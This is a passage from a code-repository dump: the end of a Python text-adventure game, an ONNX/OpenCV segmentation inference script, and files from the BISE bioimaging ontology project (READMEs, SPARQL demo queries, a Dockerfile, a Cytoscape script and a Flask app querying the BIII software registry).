Take this creature away!\")\r\nprint(\"--The guards try to take you away.--\")\r\nprint(\"You: Wait no!\")\r\nprint(\"Do you want to try to escape or convince the King of your innocence?\")\r\ngo = input(\"Choose 1:(try to escape) or 2:(try to convince): \")\r\n\r\nif go == '1':\r\n print(\"\\nYou need to regain your energy in order to escape.\")\r\n input(\"Write 'eat' to eat 3 apples to regain your energy: \")\r\n changeapple(amount[0]-3)\r\n print(\"--You regain your energy and push the guards to escape.--\")\r\n print(\"--You run toward the exit and stumble upon a demon knight.--\")\r\n print(\"--The magic stone falls out of the bag and touches you.--\")\r\n print(\"--A projection of all your doings are emitted by the stone.--\")\r\nelif go == '2':\r\n print(\"\\nYou need to regain your energy in order to convince.\")\r\n input(\"Write 'eat' to eat 3 apples to regain your energy: \")\r\n changeapple(amount[0]-3)\r\n print(\"You: I didn’t do anything to harm anybody! Do you have any proof of me being guilty! Just because I’m a different being doesn’t mean I’m a culprit! What kind of law is this!\")\r\n print(\"Demon knight: Sire, we found this magic stone in it’s attire. This can give us a true answer.\")\r\n print(\"--The stone touches you and a projection of all your doings are emitted by the stone.--\")\r\n\r\ninput(\"\\nPress enter to continue: \")\r\nprint(\"Adviser: The human doesn’t seem to be harmful.\")\r\nprint(\"Demon knight: Sire! This human completed the tasks that we couldn’t fulfill. The water serpent and that cursed demon!\")\r\nprint(\"King: We humbly apologise to you human. What would you like to receive as you reward?\")\r\nprint(\"You: I want to go back to my world.\")\r\nprint(\"--The king gladly agrees to grant your wish and escorts you to the Magic Council.--\")\r\nprint(\"Magic magistrate: We ask for your forgiveness, humble human.\")\r\nprint(\"--You accept their apology and they happily prepare for your journey home.--\")\r\nprint(\"--Everyone gathers around as the teleportation circle opens.--\")\r\nprint(\"King: I ask you, human. Do you wish to erase your memory of this world?\")\r\nques = input(\"Enter 1:(no) or 2:(yes):- \")\r\n\r\nif ques == '1':\r\n print(\"\\n--You show your gratitude for all their help, say goodbye to everyone and enter the magic circle.--\")\r\n print(\"--------------------\")\r\n print(\" / / / / / / /\")\r\n print(\" \\ \\ \\ \\ \\ \\ \\/\")\r\n print(\" / / / / / / /\")\r\n print(\"--------------------\")\r\n print(\"--You wake up remembering your great adventure and with some knowledge you gained you start your ordinary life.--\")\r\nelif ques == '2':\r\n print(\"\\n--You show your gratitude for all their help, say goodbye to everyone and enter the magic circle.--\")\r\n print(\"--------------------\")\r\n print(\" / / / / / / /\")\r\n print(\" \\ \\ \\ \\ \\ \\ \\/\")\r\n print(\" / / / / / / /\")\r\n print(\"--------------------\")\r\n print(\"--You wake up from your strange adventurous dream yet you feel like you have learned something and with some knowledge you gained you start your ordinary life.--\\n\")\r\n\r\nprint(\"\\n------------------\")\r\nprint(\"- End game! -\")\r\nprint(\"------------------\\n\")\r\n\r\nplay = input (\"Press any key to exit! :)\")\r\n" } ]
2
LeeYalin/onnx
https://github.com/LeeYalin/onnx
3eac66f06058bb92c038616507867f0b0e519d37
6d62f0dfaedd4b11483d0ed2477a54869da6f8b9
cc22c2275eb80840270b1fdfa5c16f2e1aa6e518
refs/heads/main
2023-03-05T09:28:17.171918
2021-02-20T06:56:58
2021-02-20T06:56:58
340,585,218
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5626623630523682, "alphanum_fraction": 0.6113636493682861, "avg_line_length": 28.902912139892578, "blob_id": "802b8be548aecae7885c3d757395627e9ff40475", "content_id": "9e0bafb7add86645de0ad4616c8f74c1dc03d8fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3180, "license_type": "no_license", "max_line_length": 114, "num_lines": 103, "path": "/opencvAndonnxruntime.py", "repo_name": "LeeYalin/onnx", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\nimport onnxruntime as xr\n\nimport sys\n#reload(sys)\n#sys.setdefaultxxxx(\"utf8\")\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\nimport os\nimport cv2\nimport numpy as np\nfrom easydict import EasyDict as edict\nfrom yaml import load\n\nonnxruntime = True\nopencv_use = False\n\nmodel_name = 'v3.onnx'\n######## onnxruntime 调用 ###########\nif onnxruntime:\n sess = xr.InferenceSession(model_name)#加载模型 model_best_two_auxiliary_losses\n \n input_name0 = sess.get_inputs()[0].name#获取输入层的名字,如果有多个输入,需要按照顺序都获取到\n model = sess.get_modelmeta()\n \n######## opencv调用 #########\nif opencv_use:\n net = cv2.dnn.readNetFromONNX(model_name)\n\n\n\n\n\n\n\nvideofile = 'VID_20210112_174111.mp4'\n\nvideoCapture = cv2.VideoCapture(videofile)\n#size = ((int(videoCapture.get(cv2.CAP_PROP_FRAME_WIDTH))+20)*3, int(videoCapture.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n#videoWriter = cv2.VideoWriter('kk_result.mp4', cv2.VideoWriter_fourcc(*'MJPG'), 20, size)\n\nsucc, img = videoCapture.read()\ncnt = 1\nwhile succ:\n h, w, _ = img.shape\n #cv2.imwrite(\"7777777777.png\", img)\n img = cv2.copyMakeBorder(img,0,0,82,82,cv2.BORDER_CONSTANT,value=[0,0,0])\n img = cv2.resize(img, (288, 384))\n img_f = img - (103.94, 116.78, 123.68)\n \n img_f = img_f*0.017\n \n show_image = np.uint8(img/np.max(img)*255)\n cv2.imshow('1', show_image)\n #cv2.waitKey(0)\n # show_image = cv2.cvtColor(show_image, cv2.COLOR_GRAY2BGR)\n # cv2.imshow('img',np.uint8(img/np.max(img)*255))\n \n img_f = np.array(img_f)\n img_f = np.array(np.float32(img_f))\n img_f = np.expand_dims(img_f, 0)\n \n #output_names为输出层名字,需要事先被确认好\n \n img_f = img_f.transpose(0, 3, 1, 2) # kang\n \n ######## opencv infer #########\n if opencv_use:\n start = cv2.getTickCount()\n #blob = cv2.dnn.blobFromImage(img_f, size=(388, 284), crop=False)\n # Run a model\n net.setInput(img_f)\n out = net.forward()\n out = list(out)\n mask_cv = np.argmax(out, 1).squeeze().astype(np.int8)\n end = cv2.getTickCount()\n time = (end - start) / cv2.getTickFrequency()\n print(\"opencv time is: \" + str(time) + \"s\")\n cv2.imshow('mask_cv', np.uint8(mask_cv*255))\n ######## onnxruntime infer ###########\n if onnxruntime:\n start = cv2.getTickCount()\n # res = sess.run(output_names = [\"Concat__87\"],input_feed = {input_name0:img})\n res = sess.run(output_names = [\"output1\"],input_feed = {input_name0:img_f})\n # mask = np.argmax(ort_outs[0], 1).squeeze().astype(np.int8)\n mask = np.argmax(res[0], 1).squeeze().astype(np.int8)\n #cv2.imwrite(\"result.jpg\",mask*255)\n end = cv2.getTickCount()\n time = (end - start) / cv2.getTickFrequency()\n print(\"onnxruntime time is: \" + str(time) + \"s\")\n cv2.imshow('mask_onnx', np.uint8(mask*255))\n \n cv2.waitKey(1)\n succ, img = videoCapture.read()\n cnt += 1\n#end = cv2.getTickCount()\n#time = (end - start) / cv2.getTickFrequency()\n#fps = cnt/time\n#print(\"fps is: \" + str(fps) + \"s\")\n" } ]
1
NEUBIAS/bise-core-ontology
https://github.com/NEUBIAS/bise-core-ontology
3331af3810dbce2812b04120a92be70cbc4c3b7c
99363e003db49deb5e3dd7be64da8edc0a448eaa
ba7d01c19ef4bf42a66de70cba96b9d32f67f4f0
refs/heads/master
2023-03-06T09:28:55.513435
2023-03-02T14:02:59
2023-03-02T14:02:59
76,645,241
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.7542828917503357, "alphanum_fraction": 0.768477737903595, "avg_line_length": 39.05882263183594, "blob_id": "392c9b33aee7d7b0f0c8ffeebf017d20b0b9c4ab", "content_id": "61bf8f5a6d9bc6db6f570958e10d67c92733511c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2045, "license_type": "no_license", "max_line_length": 196, "num_lines": 51, "path": "/README.md", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "# Bise Core Ontology\n\nThis repository hosts the core ontology of the BISE BioImaging Search Engine. \nLatest data dump is available from the bio.tools git hub: https://raw.githubusercontent.com/bio-tools/content/master/datasets/bise-ontology-biii-dump.ttl\n\n## Ontology development process \n1. Web protégé (online web editor) : https://webprotege.stanford.edu/#projects/38b3da5d-b5ce-4d59-972c-23fcb700256a \n2. Export to an OWL file\n3. Documentation generation (LODE) : \n - http://vowl.visualdataweb.org/webvowl-old/webvowl-old.html#iri=https://raw.githubusercontent.com/NeuBIAS/bise-core-ontology/master/owl-ontology/bise-core-ontology-v1.1.owl\n - (broken link) http://www.essepuntato.it/lode/owlapi/https://raw.githubusercontent.com/NeuBIAS/neubias-data-model/master/owl-ontology/bise-core-ontology-v1.1.owl\n\n# Demo queries\n[demo-queries.md](demo-queries.md)\n\n# Demo notebooks \n - Example of advanced ontology-based queries : [![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/NeuBIAS/bise-core-ontology/master?filepath=advanced-queries-demo.ipynb)\n - Quality-oriented queries : [![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/NeuBIAS/bise-core-ontology/master?filepath=quality-curation-queries.ipynb)\n - Authors network visualisation query: [![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/NeuBIAS/bise-core-ontology/master?filepath=network-visualization-queries.ipynb)\n\n### Getting python dependencies\nWith Conda :\n```\nconda create --name bise-ld-webapp\nsource activate bise-ld-webapp\nconda install rdflib jupyter -c conda-forge\n```\nOr with pip :\n```\npip install rdflib\npip install jupyter\n```\n### Launching the notebook\n```\njupyter-notebook\n```\n\n \n# Demo web app\n### Virtual environment setup to get python dependencies\n```\nconda create --name bise-ld-webapp\nsource activate bise-ld-webapp\nconda install flask rdflib pymongo -c conda-forge\nconda install rdflib-jsonld -c bioconda\n```\n### Launch the web app\n```\ncd bise-linked-data-webapp\npython app.py\n```\n" }, { "alpha_fraction": 0.8112094402313232, "alphanum_fraction": 0.8200590014457703, "avg_line_length": 168.5, "blob_id": "ee99e9689098a2505a9c24cc45b318a4ad61625e", "content_id": "680ecfe2f67cd454a0d5ba342ed71ecd4509fda6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 339, "license_type": "no_license", "max_line_length": 317, "num_lines": 2, "path": "/owl-ontology/README.md", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "# BISE core ontology\nBISE core ontology is a controlled vocabulary aimed at describing the content of the BISE Bio-Imaging Search engine. 
The documentation is dynamically generated here : http://www.essepuntato.it/lode/reasoner/https://raw.githubusercontent.com/NeuBIAS/bise-core-ontology/master/owl-ontology/bise-core-ontology-v1.0.1.ttl\n" }, { "alpha_fraction": 0.6949860453605652, "alphanum_fraction": 0.714484691619873, "avg_line_length": 41.17647171020508, "blob_id": "0aad973cc2577c5fb2020b0cb3ffdfd22e02c593", "content_id": "bddd8f74f5cc87d51abe996d77ab81f69e2164c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 718, "license_type": "no_license", "max_line_length": 148, "num_lines": 17, "path": "/data-dumps/Readme.md", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "# RDF data dumps generation\n\n## Data transformation process\n\n 1. For each CSV table, write a SPARQL CONSTRUCT query to align column names to RDF predicates. \n 2. Run TARQL to produce one RDF for each CSV table. \n 3. The resulting RDF files can later be deployed onto a SPARQL endpoint. A sample SPARQL endpoint is available here : http://192.54.201.50/sparql\n\n## Sample SPARQL queries\nThe following queries search for BIII registry entities whose label contains the word \"segmentation\" or \"registration\" : \n\n PREFIX biii:<http://biii.org/> \n SELECT ?x ?label ?type WHERE {\n ?x rdfs:label ?label\n FILTER (regex(?label,\"segmentation\") || regex(?label,\"registration\"))\n ?x rdf:type ?type\n } \n" }, { "alpha_fraction": 0.7088757157325745, "alphanum_fraction": 0.7221893668174744, "avg_line_length": 40.20731735229492, "blob_id": "ad908ec00ddc5850b5b7f29196f7d83e0ab842a7", "content_id": "682ba382111451a1ee2dbfa0b4511a142783b384", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3380, "license_type": "no_license", "max_line_length": 750, "num_lines": 82, "path": "/demo-queries.md", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "# Sample queries leveraging EDAM-Bioimaging and Bise Core ontologies\n## Motivations\n[Bise Core Ontology](http://www.essepuntato.it/lode/owlapi/https://raw.githubusercontent.com/NeuBIAS/neubias-data-model/master/owl-ontology/bise-core-ontology-v1.owl#d4e233) has been designed to model and better share the content of the [biii.eu](http://biii.eu) bioimaging ressources repository. [EDAM Bioimaging](https://bioportal.bioontology.org/ontologies/EDAM-BIOIMAGING) aims at capturing domain-specific knowledge related to bioimaging data analysis in terms of [topics](http://bioportal.bioontology.org/ontologies/EDAM-BIOIMAGING/?p=classes&conceptid=http%3A%2F%2Fedamontology.org%2Ftopic_0003) and [operations](http://bioportal.bioontology.org/ontologies/EDAM-BIOIMAGING/?p=classes&conceptid=http%3A%2F%2Fedamontology.org%2Foperation_0004) .\nThis web page briefly illustrates sample queries benefiting from knowledge captured in these two ontologies. Still, the RDF data dump is in a very preliminary stage and covers only few concepts and relations. \n\n## Q1\n### Intention\nShowing softwares and their dependencies. \n### How\n```\nCONSTRUCT {\n ?s1 <requires> ?d1\n} WHERE {\n ?s1 a <http://biii.eu/node/software>\n ?s1 <http://bise-eu.info/core-ontology#requires> ?d1\n}\n```\n### Results\n![](fig/deps.png)\n\n## Q2\n### Intention\nInferring software author communities based on shared interests (EDAM-Bioimaging Operations)\n### How\nwe match pairs of softwares with their corresponding authors. 
As soon as the tools share the same EDAM operation, we make the assumption that the authors share similar interests. Finally, we build a graph with edges `<share_same_interests_with>` between authors. \n```\nCONSTRUCT {\n ?a1 <share_same_interests_with> ?a2\n} where {\n ?s1 a <http://biii.eu/node/software> .\n ?s1 <http://bise-eu.info/core-ontology#hasAuthor> ?a1 .\n ?s1 <http://bise-eu.info/core-ontology#hasFunction> ?f1 .\n\n ?s2 a <http://biii.eu/node/software> .\n ?s2 <http://bise-eu.info/core-ontology#hasAuthor> ?a2 .\n ?s2 <http://bise-eu.info/core-ontology#hasFunction> ?f1 .\n}\n```\n### Results\n![](fig/authors.png)\n\n## Q3\n### Intention\nSearch for all available tools related to an EDAM topic. \n### How\nWe match an EDAM Topic whose label contains \"microscopy\". Then we search the taxonomy for all corresponding subclasses `?c rdfs:subClassOf* ?superClass`, and the softwares annotated with them. Finally, for each matched subgraph, we display an edge between a software label and a topic label. \n\n```\nCONSTRUCT {\n ?ti <http://bise-eu.info/core-ontology#hasTopic> ?label .\n} where {\n ?x a <http://biii.eu/node/software> .\n ?x <http://bise-eu.info/core-ontology#hasAuthor> ?a .\n ?x <http://dcterms/title> ?ti .\n ?x <http://bise-eu.info/core-ontology#hasTopic> ?c .\n\n ?c rdfs:subClassOf* ?superClass .\n ?superClass rdfs:label ?label .\n\n FILTER (CONTAINS(?label, \"microscopy\"))\n}\n```\n### Results\n![](fig/topics.png)\n\n## Q4\n### Intention\nExtract some metrics (sorted counts) based on EDAM terms, e.g. which topic is the most represented in biii.eu?\n### How\n\n```\nSELECT ?label (count(distinct ?s1) as ?soft_count) WHERE { \n ?s1 a <http://biii.eu/node/software> .\n ?s1 <http://bise-eu.info/core-ontology#hasTopic> ?edam_class .\n \n ?edam_class rdfs:label ?label .\n}\nGROUP BY ?edam_class ?label\nORDER BY DESC(?soft_count)\n```\n### Results\n![](fig/soft-counts.png)\n\n" }, { "alpha_fraction": 0.7319148778915405, "alphanum_fraction": 0.7446808218955994, "avg_line_length": 77.33333587646484, "blob_id": "47576a161054aa43bc5ba5857efef49ed95772af", "content_id": "4895cab69bcbd9981fe2a4a37fee10829840822b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 235, "license_type": "no_license", "max_line_length": 85, "num_lines": 3, "path": "/data-dumps/deprecated/run-tarql.sh", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "tarql -v -d \";\" biii-csv2rdf-entity.sparql entity.csv > rdf/entries.ttl\ntarql -v -d \";\" biii-csv2rdf-software.sparql softwareartifact.csv > rdf/softwares.ttl\ntarql -v -d \";\" biii-csv2rdf-paper.sparql academicpaper.csv > rdf/papers.ttl\n" }, { "alpha_fraction": 0.48383280634880066, "alphanum_fraction": 0.5023659467697144, "avg_line_length": 25.350000381469727, "blob_id": "e13718afce8713428c66cd7b3d5770164ed7ce7a", "content_id": "5e090df67a60abd3fb35893f975c1827f69ea6d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2536, "license_type": "no_license", "max_line_length": 113, "num_lines": 100, "path": "/wf-html-vis/test.js", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "/*\n* @Author: Alban Gaignard\n* @Date: 2020-03-01 15:55:48\n* @Last Modified by: Alban Gaignard\n* @Last Modified time: 2020-03-02 11:59:09\n*/\n\nvar node_id = \"1432\"\nvar node_url = \"http://test.biii.eu/node/\" + node_id\n//var node_url_json = node_url + \"?_format=json \"\n\nvar nodes = new Set() ;\nvar edges = [] ;\n\nvar cyjs_nodes = 
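/* starts empty; repopulated in updateWorkflowVis() from the fetched workflow steps */ 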
[] ;\nvar cyjs_edges = [] ;\n\n//\n//\n//\nvar node2cy = function(x) {\n\t// console.log({data: {id: x} })\n\treturn {data: {id: x, name: x} }\n}\n\n//\n//\n//\nvar edge2cy = function(x) {\n\t// console.log({data: {source: x.source, target: x.target} })\n\treturn {data: {source: x.source, target: x.target} }\n}\n\nvar updateWorkflowVis = function(json_node_url) {\n\n\t\t$.getJSON('http://test.biii.eu/wfsteps?_format=json', function(data) {\n\t\t//$.getJSON(json_node_url + \"?_format=json\", function(data) {\n\t\t console.log(data);\n\n\t\t $.each(data, function( key, value ) {\n\t\t \t\t// console.log( key + \": \" + value[\"parent_id\"] );\n\t\t \t\t if (value[\"parent_id\"] == node_id) {\n\t\t \t\t\tnodes.add(value[\"field_current_workflow_step__1\"])\n\t\t \t\t\tnodes.add(value[\"field_previous_workflow_step\"])\n\t\t \t\t\tedges.push({source:value[\"field_previous_workflow_step\"], target:value[\"field_current_workflow_step__1\"]})\n\t\t \t\t\t//console.log( value[\"field_current_workflow_step__1\"] );\n\t\t \t\t\t//console.log( value[\"field_previous_workflow_step\"] );\n\t\t \t\t }\n\t\t\t});\n\n\t\t\tconsole.log(nodes)\n\t\t\tconsole.log(edges)\n\n\t\t\tcyjs_nodes = [...nodes].filter(x => x != \"\").map(node2cy)\n\t\t\tcyjs_edges = [...edges].filter(x => x.source != \"\" && x.target != \"\").map(edge2cy)\n\n\t\t\tvar cy = window.cy = cytoscape({\n\t\t container: document.getElementById('cy'),\n\n\t\t boxSelectionEnabled: false,\n\t\t autounselectify: true,\n\n\t\t layout: {\n\t\t name: 'dagre'\n\t\t },\n\n\t\t style: [\n\t\t {\n\t\t selector: 'node',\n\t\t style: {\n\t\t 'background-color': '#11479e',\n\t\t 'label': 'data(name)',\n\t\t }\n\t\t },\n\n\t\t {\n\t\t selector: 'edge',\n\t\t style: {\n\t\t 'width': 4,\n\t\t 'target-arrow-shape': 'triangle',\n\t\t 'line-color': '#9dbaea',\n\t\t 'target-arrow-color': '#9dbaea',\n\t\t 'curve-style': 'bezier'\n\t\t }\n\t\t }\n\t\t ],\n\n\t\t elements: {\n\t\t nodes: cyjs_nodes,\n\t\t edges: cyjs_edges\n\t\t }\n\t\t });\n\n\t\t});\n\t}\n\nupdateWorkflowVis(node_url)\n\n//console.log(cyjs_nodes)\n//console.log(cyjs_edges)\n\n" }, { "alpha_fraction": 0.738095223903656, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 9.5, "blob_id": "48de8aeb13571a16ac6a354368ca7c24e290b793", "content_id": "7a2ad8071a3afe2e10f0fa3b74193a60ddfba0fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 42, "license_type": "no_license", "max_line_length": 13, "num_lines": 4, "path": "/requirements.txt", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "rdflib==6.0.2\nmatplotlib\nseaborn\nnetworkx\n" }, { "alpha_fraction": 0.7321428656578064, "alphanum_fraction": 0.7596153616905212, "avg_line_length": 23.266666412353516, "blob_id": "e99bd61e6f96e622393664484060add061b15504", "content_id": "702c47c8c657f028184fc024581ca7332f419482", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 728, "license_type": "no_license", "max_line_length": 81, "num_lines": 30, "path": "/bise-linked-data-webapp/Dockerfile", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "FROM ubuntu:16.04\n\nMAINTAINER Alban Gaignard <[email protected]>\n\nRUN apt-get update\n\nRUN apt-get install -y git curl wget bzip2 vim lynx\n\n# Install miniconda to /miniconda\nRUN curl -LO http://repo.continuum.io/miniconda/Miniconda3-latest-Linux-x86_64.sh\nRUN bash Miniconda3-latest-Linux-x86_64.sh -p /miniconda -b\nRUN rm 
Miniconda3-latest-Linux-x86_64.sh\nENV PATH=/miniconda/bin:${PATH}\n\nSHELL [\"/bin/bash\", \"-c\"]\n\nRUN conda update -y conda\n\nRUN conda create --name bise-ld-webapp\nRUN source activate bise-ld-webapp\nRUN conda install flask rdflib pymongo pyopenssl -c conda-forge\nRUN pip install rdflib-jsonld\nRUN pip install Flask-SSLify\n\nCOPY app.py .\nCOPY templates templates\nCOPY static static\nCOPY launch.sh .\n\nENTRYPOINT [ \"./launch.sh\" ]\n" }, { "alpha_fraction": 0.537019670009613, "alphanum_fraction": 0.5464698672294617, "avg_line_length": 34.082191467285156, "blob_id": "89d223f086c3fc0a85daf7f405b0e6d6fc60ac43", "content_id": "385e95ebbb97aea83d2cc1a734f8b7178c4eeebc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12804, "license_type": "no_license", "max_line_length": 122, "num_lines": 365, "path": "/bise-linked-data-webapp/app.py", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "import csv\nfrom flask import Flask, redirect, url_for, request, render_template\nimport random\n\nfrom rdflib import ConjunctiveGraph\n\napp = Flask(__name__)\n\nns = {\"nb\": \"http://bise-eu.info/core-ontology#\",\n \"biii\": \"http://bise-eu.info/core-ontology#\", # alias used by the graphQ4 query below\n \"dc\": \"http://dcterms/\",\n \"p-plan\": \"http://purl.org/net/p-plan#\",\n \"edam\": \"http://purl.obolibrary.org/obo/edam#\"}\n\ng = ConjunctiveGraph()\n#g.parse(\"bise-linked-data-webapp/static/data/neubias-dump-20180129.ttl\", format=\"turtle\")\ng.parse(\"static/data/neubias-latest.ttl\", format=\"turtle\")\ng.parse(\"static/data/EDAM-bioimaging_alpha03.owl\")\nprint(str(len(g)) + ' triples in Biii data graph')\n\[email protected]('/')\ndef index():\n return render_template('index.html')\n\[email protected]('/curation_needs_demo')\ndef curation_needs_demo():\n\n # NO PUBLICATION\n q_no_publication = \"\"\"\n SELECT (count(?title) as ?nb_soft) WHERE {\n ?s rdf:type <http://biii.eu/node/software> .\n ?s dc:title ?title .\n FILTER NOT EXISTS {?s nb:hasReferencePublication ?publication} .\n }\n \"\"\"\n q_no_publication_entries = \"\"\"\n SELECT ?s ?title WHERE {\n ?s rdf:type <http://biii.eu/node/software> .\n ?s dc:title ?title .\n FILTER NOT EXISTS {?s nb:hasReferencePublication ?publication} .\n }\n \"\"\"\n results = g.query(q_no_publication, initNs=ns)\n count_no_pub = 0\n for r in results:\n print(r)\n count_no_pub = str(r[\"nb_soft\"])\n\n results = g.query(q_no_publication_entries, initNs=ns)\n no_pub = []\n for r in results:\n no_pub.append({\"title\": r[\"title\"], \"url\": r[\"s\"]})\n if len(no_pub) > 10:\n # random.sample raises ValueError if the sample is larger than the population\n no_pub = random.sample(no_pub, 10)\n\n # NO EDAM TOPIC OR FUNCTION\n q_no_edam = \"\"\"\n SELECT (count(?title) as ?nb_soft) WHERE {\n ?s rdf:type <http://biii.eu/node/software> .\n ?s dc:title ?title .\n FILTER NOT EXISTS {?s nb:hasTopic ?topic} .\n FILTER NOT EXISTS {?s nb:hasFunction ?operation} .\n }\n \"\"\"\n results = g.query(q_no_edam, initNs=ns)\n count_no_edam = 0\n for r in results:\n count_no_edam = str(r[\"nb_soft\"])\n\n q_no_edam_entries = \"\"\"\n SELECT ?s ?title WHERE {\n ?s rdf:type <http://biii.eu/node/software> .\n ?s dc:title ?title .\n FILTER NOT EXISTS {?s nb:hasTopic ?topic} .\n FILTER NOT EXISTS {?s nb:hasFunction ?operation} .\n }\n \"\"\"\n results = g.query(q_no_edam_entries, initNs=ns)\n no_edam = []\n for r in results:\n no_edam.append({\"title\": r[\"title\"], \"url\": r[\"s\"]})\n if len(no_edam) > 10:\n # random.sample raises ValueError if the sample is larger than the population\n no_edam = random.sample(no_edam, 10)\n\n return render_template('demo_curation_needs.html',\n count_no_pub=count_no_pub,\n 
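# totals from the SPARQL counts above; the entry lists are a small random sample for curators\n 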
count_no_edam=count_no_edam,\n missing_publication = no_pub,\n missing_edam=no_edam)\n\n\[email protected]('/comulis_demo')\ndef comulis_demo():\n q_segmentation = \"\"\"\n SELECT DISTINCT ?soft ?title \n (group_concat(?function_label;separator=\"|\") as ?operations)\n (group_concat(?topic_label;separator=\"|\") as ?topics) \n WHERE { \n ?soft a <http://biii.eu/node/software> .\n ?soft <http://bise-eu.info/core-ontology#hasFunction> ?edam_function .\n ?edam_function rdfs:subClassOf* <http://edamontology.org/operation_Image_segmentation> . \n ?edam_function rdfs:label ?function_label .\n ?soft dc:title ?title .\n \n OPTIONAL {\n ?soft <http://bise-eu.info/core-ontology#hasTopic> ?edam_topic .\n ?edam_topic rdfs:label ?topic_label .\n }\n }\n GROUP BY ?soft\n ORDER BY ?title\n \"\"\"\n\n q_registration = \"\"\"\n SELECT DISTINCT ?soft ?title \n (group_concat(?function_label;separator=\"|\") as ?operations)\n (group_concat(?topic_label;separator=\"|\") as ?topics) \n WHERE { \n ?soft a <http://biii.eu/node/software> .\n ?soft <http://bise-eu.info/core-ontology#hasFunction> ?edam_function . \n ?edam_function rdfs:subClassOf* <http://edamontology.org/operation_Image_registration> . \n ?edam_function rdfs:label ?function_label . \n ?soft dc:title ?title .\n \n OPTIONAL {\n ?soft <http://bise-eu.info/core-ontology#hasTopic> ?edam_topic .\n ?edam_topic rdfs:label ?topic_label .\n }\n }\n GROUP BY ?soft\n ORDER BY ?title\n \"\"\"\n\n q_visualisation = \"\"\"\n SELECT DISTINCT ?soft ?title \n (group_concat(?function_label;separator=\"|\") as ?operations)\n (group_concat(?topic_label;separator=\"|\") as ?topics)\n WHERE { \n ?soft a <http://biii.eu/node/software> .\n ?soft <http://bise-eu.info/core-ontology#hasFunction> ?edam_function .\n ?edam_function rdfs:subClassOf* <http://edamontology.org/operation_Image_visualisation> . 
\n ?edam_function rdfs:label ?function_label .\n\n ?soft dc:title ?title .\n \n OPTIONAL {\n ?soft <http://bise-eu.info/core-ontology#hasTopic> ?edam_topic .\n ?edam_topic rdfs:label ?topic_label .\n }\n }\n GROUP BY ?soft\n ORDER BY ?title\n \"\"\"\n\n seg_entries = []\n results = g.query(q_segmentation, initNs=ns)\n for r in results:\n title = str(r[\"title\"])\n url = str(r[\"soft\"])\n operations = list(set(str(r[\"operations\"]).split(\"|\")))\n operations = filter(None, operations)\n topics = list(set(str(r[\"topics\"]).split(\"|\")))\n topics = filter(None, topics)\n seg_entries.append({\"title\":title, \"url\":url, \"operations\":operations, \"topics\":topics})\n\n reg_entries = []\n results = g.query(q_registration, initNs=ns)\n for r in results:\n title = str(r[\"title\"])\n url = str(r[\"soft\"])\n operations = list(set(str(r[\"operations\"]).split(\"|\")))\n operations = filter(None, operations)\n topics = list(set(str(r[\"topics\"]).split(\"|\")))\n topics = filter(None, topics)\n reg_entries.append({\"title\": title, \"url\": url, \"operations\": operations, \"topics\": topics})\n\n vis_entries = []\n results = g.query(q_visualisation, initNs=ns)\n for r in results:\n title = str(r[\"title\"])\n url = str(r[\"soft\"])\n operations = list(set(str(r[\"operations\"]).split(\"|\")))\n operations = filter(None, operations)\n topics = list(set(str(r[\"topics\"]).split(\"|\")))\n topics = filter(None, topics)\n vis_entries.append({\"title\": title, \"url\": url, \"operations\": operations, \"topics\": topics})\n\n return render_template('demo_comulis.html', seg_entries=seg_entries, reg_entries=reg_entries, vis_entries=vis_entries)\n\[email protected]('/cy')\ndef cy():\n return render_template('test_cy.html')\n\[email protected]('/topic_map_demo')\ndef topic_map_demo():\n query = \"\"\"\n SELECT ?topic_label ?operation_label WHERE {\n ?x a <http://biii.eu/node/software> .\n ?x <http://bise-eu.info/core-ontology#hasTopic> ?edam_topic .\n ?x <http://bise-eu.info/core-ontology#hasFunction> ?edam_operation .\n ?x <http://dcterms/title> ?title .\n \n ?edam_topic rdfs:label ?topic_label .\n ?edam_operation rdfs:label ?operation_label .\n } \n \"\"\"\n\n list_of_nodes = []\n list_of_edges = []\n qres = g.query(query)\n for row in qres:\n #print(row[\"topic_label\"] + \" <-> \" + row[\"operation_label\"])\n list_of_nodes.append({\"id\": row[\"topic_label\"], \"type\": \"topic\"})\n list_of_nodes.append({\"id\": row[\"operation_label\"], \"type\": \"operation\"})\n list_of_edges.append({\"source\": row[\"topic_label\"], \"target\": row[\"operation_label\"]})\n\n return render_template('demo_topic_map.html', nodes=list_of_nodes, edges=list_of_edges)\n\[email protected]('/graphQ4')\ndef graphQ4():\n tbl = []\n qres = g.query(\n \"\"\" \n\tSELECT ?label (count(distinct ?s1) as ?soft_count) \n\tWHERE { \n\t ?s1 a 